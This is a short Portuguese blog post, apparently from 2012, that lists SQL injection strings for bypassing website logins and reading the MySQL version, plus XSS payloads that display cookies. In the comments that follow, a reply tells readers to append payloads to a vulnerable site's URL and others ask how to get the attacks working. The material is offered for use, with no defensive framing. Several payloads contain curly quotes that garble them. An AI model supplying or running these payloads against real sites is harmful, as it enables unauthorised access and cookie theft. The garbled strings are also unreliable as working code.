Pesquisar

27 de dez de 2012

Exemplo de Ataques XSS e de SQL Injection

... Vamos aos rápidos exemplos:

Esse código de SQL injection é inserido no campo de Login ou Username de um site, onde faz com que ele se autentique como aquele usuário com uma senha qualquer:


‘or’=1    '
)or('a'='a
‘or=1
')or('1'='1
‘or’a’=‘a
'or'1'='1


e é colocado uma senha como: xxx

Esse código Mostra a versão do Banco de Dados de MYSQL, onde user123 é conhecido pelo Hacker: 'user123' or 1=(select @@version)--    ou    ' union select @@version,1,1--


Vamos ao XSS (inserindo na URL):

Exibindo Cookies:

'"><script>alert('xss');alert(document.cookie)</script>      ou
<script>alert('xss');alert(document.cookie)</script>

7 comentários:

  1. Respostas
    1. insira os códigos na URL (barra de endereços) da string do site vulnerável.

      Ex.: site.com/index.php?id=7‘or’a’=‘a

      Note o " ‘or’a’=‘a " no final da string, ee está tentando alterar o banco de dados SQL. Aí a página vai ou não te mostrar se está vulnerável a esse tipo de ataque.

      Excluir
    2. Quais codigo onde na URL ou tem que inspecionar elemento ??? quantos codigo como inseri ???

      Excluir
  2. Este comentário foi removido pelo autor.

    ResponderExcluir
  3. mais como eu coloca na URL ele redireciona para um pagina que nao existe tem que colocar (Javascripi:) e depois o codigo ? Aff to quase desistindo da computação ,anonymous :(

    ResponderExcluir
  4. Quando eu vou inserir aparece que o usuario e invalido ,seria uma boa coloca um chat no inicio

    ResponderExcluir